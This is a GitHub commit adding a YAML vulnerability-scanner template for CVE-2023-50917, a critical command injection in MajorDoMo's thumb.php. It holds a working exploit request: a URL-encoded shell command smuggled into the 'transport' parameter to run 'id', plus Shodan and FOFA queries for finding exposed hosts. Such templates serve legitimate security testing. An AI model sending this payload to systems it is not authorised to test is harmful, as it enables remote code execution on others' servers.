Create CVE-2023-50917.yaml

patch-1
Dhiyaneshwaran 2024-01-10 01:26:26 +05:30 committed by GitHub
parent ebf68ecdb9
commit d3358477de
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: CVE-2023-50917
info:
name: MajorDoMo thumb.php - OS Command Injection
author: DhiyaneshDK
severity: critical
description: "MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager."
reference:
- http://packetstormsecurity.com/files/176273/MajorDoMo-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2023/Dec/19
- https://github.com/sergejey/majordomo/commit/0662e5ebfb133445ff6154b69c61019357092178
- https://github.com/sergejey/majordomo/commit/3ec3ffb863ea3c2661ab27d398776c551f4daaac
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-50917
cwe-id: CWE-77
epss-score: 0.00104
epss-percentile: 0.41924
cpe: cpe:2.3:a:mjdm:majordomo:*:*:*:*:*:*:*:*
metadata:
vendor: mjdm
product: majordomo
shodan-query: http.favicon.hash:1903390397
fofa-query: app="MajordomoSL"
tags: packetstorm,seclists,cve,cve2023,majordomo,rce
http:
- method: GET
path:
- "{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- 'rtsp_transport'
condition: and
- type: status
status:
- 200